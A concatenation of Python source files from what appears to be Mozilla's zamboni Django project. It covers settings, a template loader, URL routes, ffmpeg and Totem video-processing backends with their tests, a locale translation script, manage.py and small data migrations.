PAYMENT_PROVIDERS = ['bango']
# If you need to get a payment provider, which one will be the default?
DEFAULT_PAYMENT_PROVIDER = 'bango'
# The currently-recommended version of the API. Any requests to versions older
# than this will include the `API-Status: Deprecated` header.
API_CURRENT_VERSION = 1
# When True, the API will return a full traceback when an exception occurs.
API_SHOW_TRACEBACKS = False
# Allow URL style format override. eg. "?format=json"
URL_FORMAT_OVERRIDE = 'format'
########NEW FILE########
# Concatenation marker: the lines below belong to lib/template_loader.py,
# not to the settings module above.
__FILENAME__ = template_loader
# -*- coding: utf-8 -*-
from django.conf import settings
from jingo import Loader as JingoLoader, Template
class Loader(JingoLoader):
    """Use JINGO_EXCLUDE_PATHS to exclude templates based on their path.
    jingo.Loader has a JINGO_EXCLUDE_APPS that only allows to provide the "app"
    part of a template (the part before the first "/").
    It doesn't allow avoiding specific templates, for example mail templates
    that we would like Django's template loader to render.
    Using this loader, we may use the JINGO_EXCLUDE_PATHS settings to decide
    whether a template should be rendered by Jingo or not.
    Example usage:
        JINGO_EXCLUDE_PATHS = (
            'foo/bar',
        )
    This will exclude all templates starting with 'foo/bar', but not 'foo/baz'
    nor 'quux/foo/bar'.
    """
    def _valid_template(self, template_name):
        """Don't load templates if their name start with a prefix from
        JINGO_EXCLUDE_PATHS."""
        if isinstance(template_name, Template):  # It's already a Template.
            return True
        jingo_valid = super(Loader, self)._valid_template(template_name)
        if not jingo_valid:
            return False
        for path_prefix in getattr(settings, 'JINGO_EXCLUDE_PATHS', []):
            # Bug fix: the class docstring promises *prefix* matching
            # ("not 'quux/foo/bar'"), but the previous code used substring
            # containment (`path_prefix in template_name`), which also
            # excluded templates that merely contained the prefix anywhere.
            if template_name.startswith(path_prefix):
                return False
        return True
########NEW FILE########
__FILENAME__ = test_template_loader
# -*- coding: utf-8 -*-
from django.test import TestCase
from lib.template_loader import Loader
class TestLoader(TestCase):
    def test_valid_template(self):
        """Exercise _valid_template against both JINGO_EXCLUDE_APPS (handled
        by jingo's parent loader) and our own JINGO_EXCLUDE_PATHS."""
        loader = Loader()
        with self.settings(JINGO_EXCLUDE_PATHS=[], JINGO_EXCLUDE_APPS=[]):
            assert loader._valid_template('foo')  # No JINGO_EXCLUDE_*.
        with self.settings(JINGO_EXCLUDE_PATHS=[],
                           JINGO_EXCLUDE_APPS=['foo', 'bar/baz']):
            assert not loader._valid_template('foo')  # Excluded by jingo.
            assert not loader._valid_template('foo/bar')
            # This is valid, and shouldn't, and that's why we have our own
            # loader which uses JINGO_EXCLUDE_PATHS.
            assert loader._valid_template('bar/baz')
        with self.settings(JINGO_EXCLUDE_PATHS=['foo/bar'],
                           JINGO_EXCLUDE_APPS=[]):
            assert loader._valid_template('foo')
            assert not loader._valid_template('foo/bar')
            assert not loader._valid_template('foo/bar/baz')
########NEW FILE########
__FILENAME__ = urls_base
from django.conf import settings
from django.conf.urls import include, patterns, url
from django.contrib import admin
from django.shortcuts import redirect
from django.views.decorators.cache import cache_page
from django.views.i18n import javascript_catalog
admin.autodiscover()
# Custom error handlers (implemented in amo.views).
handler403 = 'amo.views.handler403'
handler404 = 'amo.views.handler404'
handler500 = 'amo.views.handler500'
urlpatterns = patterns('',
    # AMO homepage or Marketplace Developer Hub? Choose your destiny.
    url('^$', settings.HOME, name='home'),
    # Add-ons.
    ('', include('addons.urls')),
    # Tags.
    ('', include('tags.urls')),
    # Files
    ('^files/', include('files.urls')),
    # AMO admin (not django admin).
    ('^admin/', include('zadmin.urls')),
    # App versions.
    ('pages/appversions/', include('applications.urls')),
    # Services
    ('', include('amo.urls')),
    # Paypal
    ('^services/', include('paypal.urls')),
    # Javascript translations. Cached for a year since the catalog only
    # changes on deploy.
    url('^jsi18n.js$', cache_page(60 * 60 * 24 * 365)(javascript_catalog),
        {'domain': 'javascript', 'packages': ['zamboni']}, name='jsi18n'),
    # Redirect persona/xxx
    ('^getpersonas$',
     lambda r: redirect('http://www.getpersonas.com/gallery/All/Popular',
                        permanent=True)),
    url('^persona/(?P<persona_id>\d+)', 'addons.views.persona_redirect',
        name='persona'),
    # Redirect top-tags to tags/top
    ('^top-tags/?',
     lambda r: redirect('tags.top_cloud', permanent=True)),
    ('^addons/contribute/(\d+)/?$',
     lambda r, id: redirect('addons.contribute', id, permanent=True)),
)
if settings.TEMPLATE_DEBUG:
    # Remove leading and trailing slashes so the regex matches.
    media_url = settings.MEDIA_URL.lstrip('/').rstrip('/')
    urlpatterns += patterns('',
        (r'^%s/(?P<path>.*)$' % media_url, 'django.views.static.serve',
         {'document_root': settings.MEDIA_ROOT}),
    )
if settings.SERVE_TMP_PATH and settings.DEBUG:
    # Serve files from TMP_PATH locally during development.
    urlpatterns += patterns('',
        (r'^tmp/(?P<path>.*)$', 'django.views.static.serve',
         {'document_root': settings.TMP_PATH}),
    )
########NEW FILE########
__FILENAME__ = dummy
from .utils import VideoBase
class Video(VideoBase):
    """Used for testing."""
    @classmethod
    def library_available(cls):
        # The dummy backend never shells out, so it is always "installed".
        return True
########NEW FILE########
__FILENAME__ = ffmpeg
import logging
import re
import tempfile
from django.conf import settings
from django_statsd.clients import statsd
from tower import ugettext as _
from .utils import check_output, subprocess, VideoBase
log = logging.getLogger('z.video')
# Patterns for scraping `ffmpeg -i` probe output (written to stderr).
formats_re = [
    # e.g. "Input #0, matroska,webm, from '...'"
    re.compile('Input #0, ([\w,]+)?, from'),
    # Newer ffmpeg reports the container via metadata, e.g. "doctype : webm".
    re.compile('doctype\s+: (\w+)'),
]
# e.g. "Duration: 00:00:10.00," -> captures (hours, minutes, seconds).
duration_re = re.compile('Duration: (\d{2}):(\d{2}):(\d{2}.\d{2}),')
# Video stream dimensions, e.g. "Stream #0... 640x360".
dimensions_re = re.compile('Stream #0.*?(\d+)x(\d+)')
version_re = re.compile('ffmpeg version (\d\.+)', re.I)
class Video(VideoBase):
    """Video backend that shells out to the ffmpeg binary."""
    name = settings.FFMPEG_BINARY
    def _call(self, note, catch_error, *args):
        """Run ffmpeg against self.filename with the extra `args`.

        `note`: suffix for the statsd timer name.
        `catch_error`: when True, a non-zero exit is swallowed and ffmpeg's
        output returned anyway (probing a file without an output file makes
        ffmpeg "fail" while still printing the info we want).
        """
        with statsd.timer('video.ffmpeg.%s' % note):
            args = [self.name,
                    '-y', # Don't prompt for overwrite of file
                    '-i', self.filename] + list(args)
            log.info('ffmpeg called with: %s' % ' '.join(args))
            try:
                res = check_output(args, stderr=subprocess.STDOUT)
            except subprocess.CalledProcessError, e:
                # This is because to get the information about a file
                # you specify the input file, but not the output file
                # ffmpeg errors, but returns all the information we want.
                if not catch_error:
                    log.error('ffmpeg failed with: %s' % e.output)
                    raise
                else:
                    res = e.output
            return res
    def get_meta(self):
        """
        Get the metadata for the file. You should call this first
        so we can populate some meta data and ensure that the file is valid.
        """
        result = self._call('meta', True)
        data = {}
        # Container format(s), e.g. ['matroska', 'webm'].
        for fmt in formats_re:
            formats = fmt.search(result)
            if formats:
                data['formats'] = formats.group(1).split(',')
        # Duration converted from HH:MM:SS.ss into seconds.
        duration = duration_re.search(result)
        if duration:
            data['duration'] = ((3600 * int(duration.group(1)))
                                + (60 * int(duration.group(2)))
                                + float(duration.group(3)))
        dimensions = dimensions_re.search(result)
        if dimensions:
            data['dimensions'] = (int(dimensions.group(1)),
                                  int(dimensions.group(2)))
        self.meta = data
    def get_screenshot(self, size):
        """
        Gets a screenshot half way through the video. Will return the location
        of the temporary file. It is up to the calling function to remove the
        temporary file after its completed.
        `size`: a tuple of the width and height
        """
        assert self.is_valid()
        assert self.meta.get('duration')
        halfway = int(self.meta['duration'] / 2)
        dest = tempfile.mkstemp(suffix='.png')[1]
        self._call('screenshot',
                   False,
                   '-vframes', '1', # Only grab one frame.
                   '-ss', str(halfway), # Start half way through.
                   '-s', '%sx%s' % size, # Size of image.
                   dest)
        return dest
    def get_encoded(self, size):
        """
        Recodes the video into a different size and sets its bit rate
        to something suitable. In theory we are also doing this to ensure
        that the video is cleaned. Maybe.
        Will return the location of the temporary file. It is up to the
        calling function to remove the temporary file after its completed.
        `size`: a tuple of the width and height
        """
        assert self.is_valid()
        dest = tempfile.mkstemp(suffix='.webm')[1]
        self._call('encode',
                   False,
                   '-s', '%sx%s' % size, # Size of video.
                   dest)
        return dest
    def is_valid(self):
        """Validate self.meta (get_meta() must have run); returns True when
        clean, and populates self.errors otherwise."""
        assert self.meta is not None
        self.errors = []
        if 'webm' not in self.meta.get('formats', ''):
            self.errors.append(_('Videos must be in WebM.'))
        #TODO(andym): More checks on duration, file size, bit rate?
        return not self.errors
    @classmethod
    def library_available(cls):
        """Return True when the ffmpeg binary can be executed."""
        try:
            output = check_output([cls.name, '-version'],
                                  stderr=subprocess.STDOUT)
            # If in the future we want to check for an ffmpeg version
            # this is the place to do it.
            return bool(version_re.match(output))
        except (OSError, subprocess.CalledProcessError):
            pass
########NEW FILE########
__FILENAME__ = tasks
import logging
import os
import shutil
from django.conf import settings
from celeryutils import task
import amo
from amo.decorators import set_modified_on
from lib.video import library
import waffle
log = logging.getLogger('z.devhub.task')
# Per-task Celery time limits, configured in settings.
time_limits = settings.CELERY_TIME_LIMITS['lib.video.tasks.resize_video']
# Video decoding can take a while, so let's increase these limits.
@task(time_limit=time_limits['hard'], soft_time_limit=time_limits['soft'])
@set_modified_on
def resize_video(src, instance, user=None, **kw):
    """Try and resize a video and cope if it fails.

    `src`: path to the uploaded source video.
    `instance`: the preview object being processed; deleted on failure
    (see _resize_error).
    `user`: attributed in the activity log when a failure is recorded.
    """
    try:
        result = _resize_video(src, instance, **kw)
    except Exception, err:
        log.error('Error on processing video: %s' % err)
        _resize_error(src, instance, user)
        raise
    # _resize_video returns None (not True) when it bails out early.
    if not result:
        log.error('Error on processing video, _resize_video not True.')
        _resize_error(src, instance, user)
    log.info('Video resize complete.')
    return
def _resize_error(src, instance, user):
    """An error occurred in processing the video, deal with that approp."""
    # Record the failure in the activity log, then drop the broken preview.
    amo.log(amo.LOG.VIDEO_ERROR, instance, user=user)
    instance.delete()
def _resize_video(src, instance, **kw):
    """
    Given a preview object and a file somewhere: encode into the full
    preview size and generate a thumbnail.

    Returns True on success. Returns None (after logging) on any early
    bail-out so the caller treats it as a failure.
    """
    log.info('[1@None] Encoding video %s' % instance.pk)
    lib = library
    if not lib:
        log.info('Video library not available for %s' % instance.pk)
        return
    video = lib(src)
    video.get_meta()
    if not video.is_valid():
        log.info('Video is not valid for %s' % instance.pk)
        return
    if waffle.switch_is_active('video-encode'):
        # Do the video encoding.
        try:
            video_file = video.get_encoded(amo.ADDON_PREVIEW_SIZES[1])
        except Exception:
            log.info('Error encoding video for %s, %s' %
                     (instance.pk, video.meta), exc_info=True)
            return
    # Do the thumbnail next, this will be the signal that the
    # encoding has finished.
    try:
        thumbnail_file = video.get_screenshot(amo.ADDON_PREVIEW_SIZES[0])
    except Exception:
        # We'll have this file floating around because the video
        # encoded successfully, or something has gone wrong in which case
        # we don't want the file around anyway.
        if waffle.switch_is_active('video-encode'):
            os.remove(video_file)
        log.info('Error making thumbnail for %s' % instance.pk, exc_info=True)
        return
    # Make sure the destination directories exist before moving files in.
    for path in (instance.thumbnail_path, instance.image_path):
        dirs = os.path.dirname(path)
        if not os.path.exists(dirs):
            os.makedirs(dirs)
    shutil.move(thumbnail_file, instance.thumbnail_path)
    if waffle.switch_is_active('video-encode'):
        # Move the file over, removing the temp file.
        shutil.move(video_file, instance.image_path)
    else:
        # We didn't re-encode the file.
        shutil.copyfile(src, instance.image_path)
    instance.sizes = {'thumbnail': amo.ADDON_PREVIEW_SIZES[0],
                      'image': amo.ADDON_PREVIEW_SIZES[1]}
    instance.save()
    log.info('Completed encoding video: %s' % instance.pk)
    return True
########NEW FILE########
__FILENAME__ = tests
import os
import stat
import tempfile
from mock import Mock, patch
from nose import SkipTest
from nose.tools import eq_
import waffle
from django.conf import settings
import amo
import amo.tests
from amo.tests.test_helpers import get_image_path
from devhub.models import UserLog
from lib.video import get_library
from lib.video import ffmpeg, totem
from lib.video.tasks import resize_video
from users.models import UserProfile
files = {
'good': os.path.join(os.path.dirname(__file__),
'fixtures/disco-truncated.webm'),
'bad': get_image_path('mozilla.png'),
}
older_output = """
Input #0, matroska,webm, from 'lib/video/fixtures/disco-truncated.webm':
Duration: 00:00:10.00, start: 0.000000, bitrate: 298 kb/s
Stream #0:0(eng): Video: vp8, yuv420p, 640x360, SAR 1:1 DAR 16:9,
Stream #0:1(eng): Audio: vorbis, 44100 Hz, stereo, s16 (default)
"""
other_output = """
Input #0, matroska, from 'disco-truncated.webm':
Metadata:
doctype : webm
"""
totem_indexer_good = """
TOTEM_INFO_DURATION=10
TOTEM_INFO_HAS_VIDEO=True
TOTEM_INFO_VIDEO_WIDTH=640
TOTEM_INFO_VIDEO_HEIGHT=360
TOTEM_INFO_VIDEO_CODEC=VP8 video
TOTEM_INFO_FPS=25
TOTEM_INFO_HAS_AUDIO=True
TOTEM_INFO_AUDIO_BITRATE=128
TOTEM_INFO_AUDIO_CODEC=Vorbis
TOTEM_INFO_AUDIO_SAMPLE_RATE=44100
TOTEM_INFO_AUDIO_CHANNELS=Stereo
"""
totem_indexer_bad = """
TOTEM_INFO_HAS_VIDEO=False
TOTEM_INFO_HAS_AUDIO=False
"""
class TestFFmpegVideo(amo.tests.TestCase):
    def setUp(self):
        self.video = ffmpeg.Video(files['good'])
        if not ffmpeg.Video.library_available():
            raise SkipTest
        # Stub out the ffmpeg call; tests feed it canned probe output.
        self.video._call = Mock()
        self.video._call.return_value = older_output
    def test_meta(self):
        self.video.get_meta()
        eq_(self.video.meta['formats'], ['matroska', 'webm'])
        eq_(self.video.meta['duration'], 10.0)
        eq_(self.video.meta['dimensions'], (640, 360))
    def test_valid(self):
        self.video.get_meta()
        assert self.video.is_valid()
    def test_dev_valid(self):
        # Newer ffmpeg reports the container via a "doctype" metadata line.
        self.video._call.return_value = other_output
        self.video.get_meta()
        eq_(self.video.meta['formats'], ['webm'])
    # These tests can be a little bit slow, to say the least so they are
    # skipped. Un-skip them if you want.
    def test_screenshot(self):
        raise SkipTest
        self.video.get_meta()
        try:
            screenshot = self.video.get_screenshot(amo.ADDON_PREVIEW_SIZES[0])
            assert os.stat(screenshot)[stat.ST_SIZE]
        finally:
            os.remove(screenshot)
    def test_encoded(self):
        raise SkipTest
        self.video.get_meta()
        try:
            video = self.video.get_encoded(amo.ADDON_PREVIEW_SIZES[0])
            assert os.stat(video)[stat.ST_SIZE]
        finally:
            os.remove(video)
class TestBadFFmpegVideo(amo.tests.TestCase):
    def setUp(self):
        # files['bad'] is a PNG, deliberately not a video.
        self.video = ffmpeg.Video(files['bad'])
        if not self.video.library_available():
            raise SkipTest
        self.video.get_meta()
    def test_meta(self):
        eq_(self.video.meta['formats'], ['image2'])
        assert not self.video.is_valid()
    def test_valid(self):
        assert not self.video.is_valid()
    def test_screenshot(self):
        # get_screenshot/get_encoded assert is_valid(), so they must blow up.
        self.assertRaises(AssertionError, self.video.get_screenshot,
                          amo.ADDON_PREVIEW_SIZES[0])
    def test_encoded(self):
        self.assertRaises(AssertionError, self.video.get_encoded,
                          amo.ADDON_PREVIEW_SIZES[0])
class TestTotemVideo(amo.tests.TestCase):
    def setUp(self):
        self.video = totem.Video(files['good'])
        # Stub out the indexer; tests feed it canned output.
        self.video._call_indexer = Mock()
    def test_meta(self):
        self.video._call_indexer.return_value = totem_indexer_good
        self.video.get_meta()
        eq_(self.video.meta['formats'], 'VP8')
        eq_(self.video.meta['duration'], '10')
    def test_valid(self):
        self.video._call_indexer = Mock()
        self.video._call_indexer.return_value = totem_indexer_good
        self.video.get_meta()
        assert self.video.is_valid()
    def test_not_valid(self):
        self.video._call_indexer.return_value = totem_indexer_bad
        self.video.get_meta()
        assert not self.video.is_valid()
    # These tests can be a little bit slow, to say the least so they are
    # skipped. Un-skip them if you want.
    def test_screenshot(self):
        raise SkipTest
        self.video.get_meta()
        try:
            screenshot = self.video.get_screenshot(amo.ADDON_PREVIEW_SIZES[0])
            assert os.stat(screenshot)[stat.ST_SIZE]
        finally:
            os.remove(screenshot)
    def test_encoded(self):
        raise SkipTest
        self.video.get_meta()
        try:
            video = self.video.get_encoded(amo.ADDON_PREVIEW_SIZES[0])
            assert os.stat(video)[stat.ST_SIZE]
        finally:
            os.remove(video)
@patch('lib.video.totem.Video.library_available')
@patch('lib.video.ffmpeg.Video.library_available')
@patch.object(settings, 'VIDEO_LIBRARIES',
              ['lib.video.totem', 'lib.video.ffmpeg'])
def test_choose(ffmpeg_, totem_):
    """get_library picks the first configured backend that is available.

    Note: mock decorators apply bottom-up, so `ffmpeg_` is the first
    argument and `totem_` the second (patch.object with an explicit value
    injects no argument).
    """
    ffmpeg_.return_value = True
    totem_.return_value = True
    eq_(get_library(), totem.Video)
    totem_.return_value = False
    eq_(get_library(), ffmpeg.Video)
    ffmpeg_.return_value = False
    eq_(get_library(), None)
class TestTask(amo.tests.TestCase):
    # TODO(andym): make these more sparkly and cope with totem and not blow
    # up all the time.
    def setUp(self):
        waffle.models.Switch.objects.create(name='video-encode', active=True)
        # Stand-in for the preview instance resize_video operates on.
        self.mock = Mock()
        self.mock.thumbnail_path = tempfile.mkstemp()[1]
        self.mock.image_path = tempfile.mkstemp()[1]
        self.mock.pk = 1
    @patch('lib.video.tasks._resize_video')
    def test_resize_error(self, _resize_video):
        user = UserProfile.objects.create(email='[email protected]')
        _resize_video.side_effect = ValueError
        with self.assertRaises(ValueError):
            resize_video(files['good'], self.mock, user=user)
        # On error the instance is deleted and the failure is logged.
        assert self.mock.delete.called
        assert UserLog.objects.filter(user=user,
            activity_log__action=amo.LOG.VIDEO_ERROR.id).exists()
    @patch('lib.video.tasks._resize_video')
    def test_resize_failed(self, _resize_video):
        # A None result (early bail-out) also deletes the instance.
        user = UserProfile.objects.create(email='[email protected]')
        _resize_video.return_value = None
        resize_video(files['good'], self.mock, user=user)
        assert self.mock.delete.called
    @patch('lib.video.ffmpeg.Video.get_encoded')
    def test_resize_video_no_encode(self, get_encoded):
        raise SkipTest
        waffle.models.Switch.objects.update(name='video-encode', active=False)
        resize_video(files['good'], self.mock)
        assert not get_encoded.called
        assert isinstance(self.mock.sizes, dict)
        assert self.mock.save.called
    def test_resize_video(self):
        raise SkipTest
        resize_video(files['good'], self.mock)
        assert isinstance(self.mock.sizes, dict)
        assert self.mock.save.called
    def test_resize_image(self):
        raise SkipTest
        resize_video(files['bad'], self.mock)
        assert not isinstance(self.mock.sizes, dict)
        assert not self.mock.save.called
########NEW FILE########
__FILENAME__ = totem
import logging
import os
import re
import tempfile
from django.conf import settings
from django_statsd.clients import statsd
from tower import ugettext as _
from .utils import check_output, subprocess, VideoBase
log = logging.getLogger('z.video')
# Codec name from the indexer output, e.g.
# "TOTEM_INFO_VIDEO_CODEC=VP8 video" -> 'VP8'.
format_re = re.compile('TOTEM_INFO_VIDEO_CODEC=([\w]+)')
# Duration in whole seconds, e.g. "TOTEM_INFO_DURATION=10".
duration_re = re.compile('TOTEM_INFO_DURATION=(\d+)')
class Video(VideoBase):
    """Video backend that shells out to the Totem indexer/thumbnailer."""
    name = settings.TOTEM_BINARIES
    def _call_indexer(self):
        """Run the Totem indexer on self.filename and return its raw output.

        Raises ValueError when the source file is missing, or
        subprocess.CalledProcessError when the indexer exits non-zero.
        """
        with statsd.timer('video.totem.meta'):
            args = [self.name['indexer'],
                    self.filename]
            if not os.path.exists(self.filename):
                log.info('file did not exist for thumbnailing: %s'
                         % self.filename)
                # Bug fix: this was a bare `raise` with no active exception,
                # which itself blows up with a TypeError at runtime. Raise
                # something explicit instead.
                raise ValueError('File does not exist: %s' % self.filename)
            log.info('totem called with: %s' % ' '.join(args))
            try:
                res = check_output(args, stderr=subprocess.STDOUT)
            except subprocess.CalledProcessError, e:
                log.error('totem failed with: %s' % e.output)
                raise
            log.info('totem returned: %s' % res)
            return res
    def _call_thumbnailer(self, timepoint, destination, size):
        """Run the Totem thumbnailer, writing a PNG to `destination`.

        `timepoint` and `size` are strings, passed straight to the CLI.
        """
        with statsd.timer('video.totem.screenshot'):
            args = [self.name['thumbnailer'],
                    '-t', timepoint, # Start at this point.
                    '-s', size, # This can only be one of the sizes.
                    '-r', # Remove overlayed borders.
                    self.filename,
                    destination]
            log.info('totem called with: %s' % ' '.join(args))
            try:
                res = check_output(args, stderr=subprocess.STDOUT)
            except subprocess.CalledProcessError, e:
                log.error('totem failed with: %s' % e.output)
                raise
            return res
    def get_meta(self):
        """Populate self.meta with the codec name and duration (strings)."""
        result = self._call_indexer()
        data = {}
        formats = format_re.search(result)
        if formats:
            data['formats'] = formats.group(1)
        duration = duration_re.search(result)
        if duration:
            data['duration'] = duration.group(1)
        self.meta = data
    def get_screenshot(self, size):
        """Return the path of a screenshot taken half way through the video.

        The caller is responsible for removing the temporary file.
        `size`: a tuple of width and height; Totem takes one dimension, so
        the larger of the two is used.
        """
        assert self.is_valid()
        assert self.meta.get('duration')
        halfway = int(self.meta['duration']) / 2
        dest = tempfile.mkstemp(suffix='.png')[1]
        self._call_thumbnailer(str(halfway), dest, str(max(size)))
        return dest
    def is_valid(self):
        """Validate self.meta (get_meta() must have run); True when clean,
        populating self.errors otherwise."""
        assert self.meta is not None
        self.errors = []
        if 'VP8' not in self.meta.get('formats', ''):
            self.errors.append(_('Videos must be in WebM.'))
        #TODO(andym): More checks on duration, file size, bit rate?
        return not self.errors
    @classmethod
    def library_available(cls):
        try:
            # We'll assume if the thumbnailer is there so is the indexer.
            check_output([cls.name['thumbnailer'], '-help'],
                         stderr=subprocess.STDOUT)
            return True
        except (OSError, subprocess.CalledProcessError):
            pass
########NEW FILE########
__FILENAME__ = utils
import subprocess
def check_output(*popenargs, **kwargs):
    """Run a command and return its stdout.

    Backport of Python 2.7's subprocess.check_output for older runtimes.
    Raises ValueError if a `stdout` keyword is supplied, and
    subprocess.CalledProcessError (carrying an `output` attribute) when
    the command exits non-zero.
    """
    if 'stdout' in kwargs:
        raise ValueError('stdout argument not allowed, it will be overridden.')
    proc = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
    captured = proc.communicate()[0]
    exit_code = proc.poll()
    if not exit_code:
        return captured
    # Non-zero exit: report the command the caller actually ran.
    command = kwargs.get("args")
    if command is None:
        command = popenargs[0]
    failure = subprocess.CalledProcessError(exit_code, command)
    failure.output = captured
    raise failure
class VideoBase(object):
    """Abstract base for video backends (ffmpeg, totem, dummy).

    Subclasses override probing (get_meta), validation (is_valid),
    thumbnailing (get_screenshot) and re-encoding (get_encoded).
    """
    def __init__(self, filename):
        # Path to the source video; meta/errors are filled in later.
        self.filename = filename
        self.meta = None
        self.errors = []
    def _call(self):
        # Subclasses shell out to their binary here.
        raise NotImplementedError
    def get_encoded(self, size):
        raise NotImplementedError
    def get_screenshot(self, size):
        raise NotImplementedError
    def get_meta(self):
        # Optional hook: populate self.meta with probing results.
        pass
    @classmethod
    def library_available(cls):
        # Subclasses return True when their binary is usable.
        pass
    def is_valid(self):
        # Subclasses return a truthy value when the video passes checks.
        return
########NEW FILE########
__FILENAME__ = generate_categories_translations
#!/usr/bin/env python
import os
import requests
# Public Marketplace API endpoint returning categories localized to %s.
api_url = 'https://marketplace.firefox.com/api/v1/apps/category/?lang=%s'
english_categories = { # Stolen from fireplace's categories.js
    'games': 'Games',
    #'books': 'Books', # Commented because already present in .po files.
    'business': 'Business',
    'education': 'Education',
    'entertainment': 'Entertainment',
    'health-fitness': 'Health & Fitness',
    'lifestyle': 'Lifestyle',
    'maps-navigation': 'Maps & Navigation',
    'music': 'Music',
    'news-weather': 'News & Weather',
    'photo-video': 'Photo & Video',
    'productivity': 'Productivity',
    'reference': 'Reference',
    'shopping': 'Shopping',
    'social': 'Social',
    'sports': 'Sports',
    'travel': 'Travel',
    'utilities': 'Utilities'
}
def build_locale_dict(data):
    """Map category slug -> localized name from an API category response.

    Returns None when the response has no 'objects' key (API error).
    Slugs not present in english_categories are ignored.
    """
    # Idiom fix: `'objects' not in data` instead of `not 'objects' in data`.
    if 'objects' not in data:
        return None
    return dict(((d['slug'], d['name']) for d in data['objects']
                 if d['slug'] in english_categories))
def write_po(filename, locale_categories):
    """Append msgid/msgstr entries for the given translations to a .po file.

    `locale_categories` maps category slugs to localized (unicode) names.
    """
    with open(filename, 'a') as f:
        for slug, translation in locale_categories.items():
            f.write('\n')
            f.write('#: /mkt/search/forms.py\n')
            f.write('msgid "%s"\n' % english_categories[slug])
            # Use the value already unpacked from items() instead of the
            # redundant second lookup locale_categories[slug].
            f.write('msgstr "%s"\n' % translation.encode('utf-8'))
def main():
    """Append API-provided category translations to each locale's .po file.

    Must be run from the locale/ directory. Skips locales without a
    messages.po file and locales the API returns untranslated; aborts on
    API errors.
    """
    if not os.getcwd().endswith('locale'):
        print 'Run me from the locale/ directory please.'
        return
    for locale in os.listdir('.'):
        if not os.path.isdir(locale) or locale == 'templates':
            # print "Skipping %s since it's not a locale directory" % locale
            continue
        fname = os.path.join(locale, 'LC_MESSAGES', 'messages.po')
        if not os.path.exists(fname):
            # print "Skipping %s since it doesn't contain a messages.po file"
            continue
        print "Requesting categories for locale %s from the API" % locale
        response = requests.get(api_url % locale)
        if not response.status_code == 200:
            print "Error while requesting API, aborting script."
            return
        locale_categories = build_locale_dict(response.json())
        if locale_categories is None:
            print "Error in API response, aborting script."
            return
        if locale_categories == english_categories:
            print "Skipping '%s' since API response is not translated" % locale
            continue
        print "Writing %d translations to %s" % (len(locale_categories), fname)
        write_po(fname, locale_categories)
########NEW FILE########
__FILENAME__ = manage
#!/usr/bin/env python
import logging
import os
import site
import sys
import warnings
ROOT = os.path.dirname(os.path.abspath(__file__))
# Running under `python -m cProfile manage.py ...` makes __file__ point at
# cProfile, so the project root must come from the environment instead.
if os.path.splitext(os.path.basename(__file__))[0] == 'cProfile':
    if os.environ.get('ZAMBONI_PATH'):
        ROOT = os.environ['ZAMBONI_PATH']
    else:
        print 'When using cProfile you must set $ZAMBONI_PATH'
        sys.exit(2)
path = lambda *a: os.path.join(ROOT, *a)
prev_sys_path = list(sys.path)
site.addsitedir(path('apps'))
site.addsitedir(path('vendor/lib/python'))
# Move the new items to the front of sys.path. (via virtualenv)
new_sys_path = []
for item in list(sys.path):
    if item not in prev_sys_path:
        new_sys_path.append(item)
        sys.path.remove(item)
sys.path[:0] = new_sys_path
# No third-party imports until we've added all our sitedirs!
from django.core.management import call_command, execute_from_command_line
# Figuring out what settings file to use.
# 1. Look first for the command line setting.
setting = None
if __name__ == '__main__':
    for k, v in enumerate(sys.argv):
        if v.startswith('--settings'):
            setting = v.split('=')[1]
            del sys.argv[k]
            break
# 2. If not, find the env variable.
if not setting:
    setting = os.environ.get('DJANGO_SETTINGS_MODULE', '')
# Django runserver does that double reload of installed settings, settings
# setting to zamboni.settings. We don't want to have zamboni on the path.
if setting.startswith(('zamboni', # typical git clone destination
                       'workspace', # Jenkins
                       'project', # vagrant VM
                       'freddo')):
    setting = setting.split('.', 1)[1]
# The average Django user will have DJANGO_SETTINGS_MODULE set to settings
# for our purposes that means, load the default site, so if nothing is
# specified by now, use the default.
if setting in ('settings', ''):
    setting = 'settings_local'
# Finally load the settings file that was specified.
from django.utils import importlib
settings = importlib.import_module(setting)
os.environ['DJANGO_SETTINGS_MODULE'] = setting
if not settings.DEBUG:
    warnings.simplefilter('ignore')
import session_csrf
session_csrf.monkeypatch()
# Fix jinja's Markup class to not crash when localizers give us bad format
# strings.
from jinja2 import Markup
mod = Markup.__mod__
trans_log = logging.getLogger('z.trans')
#waffle and amo form an import cycle because amo patches waffle and
#waffle loads the user model, so we have to make sure amo gets
#imported before anything else imports waffle.
import amo
# Hardcore monkeypatching action.
import jingo.monkey
jingo.monkey.patch()
# Replacement for Markup.__mod__ that logs and swallows formatting errors
# caused by bad localizer format strings instead of crashing the page.
def new(self, arg):
    try:
        return mod(self, arg)
    except Exception:
        trans_log.error(unicode(self))
        return ''
Markup.__mod__ = new
import djcelery
djcelery.setup_loader()
# Import for side-effect: configures our logging handlers.
# pylint: disable-msg=W0611
from lib.log_settings_base import log_configure
log_configure()
import django.conf
newrelic_ini = getattr(django.conf.settings, 'NEWRELIC_INI', None)
load_newrelic = False
# Monkey patches DRF to not use fqdn urls.
from mkt.api.patch import patch
patch()
if newrelic_ini:
    import newrelic.agent
    try:
        newrelic.agent.initialize(newrelic_ini)
        load_newrelic = True
    # NOTE(review): deliberately broad — any New Relic init failure is
    # logged and ignored rather than blocking startup.
    except:
        startup_logger = logging.getLogger('z.startup')
        startup_logger.exception('Failed to load new relic config.')
if __name__ == "__main__":
    # If product details aren't present, get them.
    from product_details import product_details
    if not product_details.last_update:
        print 'Product details missing, downloading...'
        call_command('update_product_details')
        product_details.__init__() # reload the product details
    execute_from_command_line()
########NEW FILE########
__FILENAME__ = 219-new-features
from addons.cron import reset_featured_addons
# One-off migration: rebuild the featured add-ons collections.
print 'here we go'
reset_featured_addons()
########NEW FILE########
__FILENAME__ = 250-initial-price-tiers
from decimal import Decimal
from market.models import Price
# Parenthesise the tuple: Python 2 tolerated a bare tuple as the iterable
# of a list comprehension, but it is a SyntaxError on Python 3.
tiers = [Decimal(x) for x in (
    '0.99', '1.99', '2.99', '3.99', '4.99', '5.99', '6.99', '7.99', '8.99',
    '9.99', '10.99', '11.99', '12.99', '13.99', '14.99', '15.99', '16.99',
    '17.99', '18.99', '19.99', '20.99', '21.99', '22.99', '23.99', '24.99',
    '29.99', '34.99', '39.99', '44.99', '49.99')]
def run():
    """Create the 30 initial USD price tiers, named 'Tier 1'..'Tier 30'."""
    for i, price in enumerate(tiers, 1):
        Price.objects.create(price=price, name='Tier %s' % (i,))
########NEW FILE########
__FILENAME__ = 264-locale-indexes
from django.conf import settings
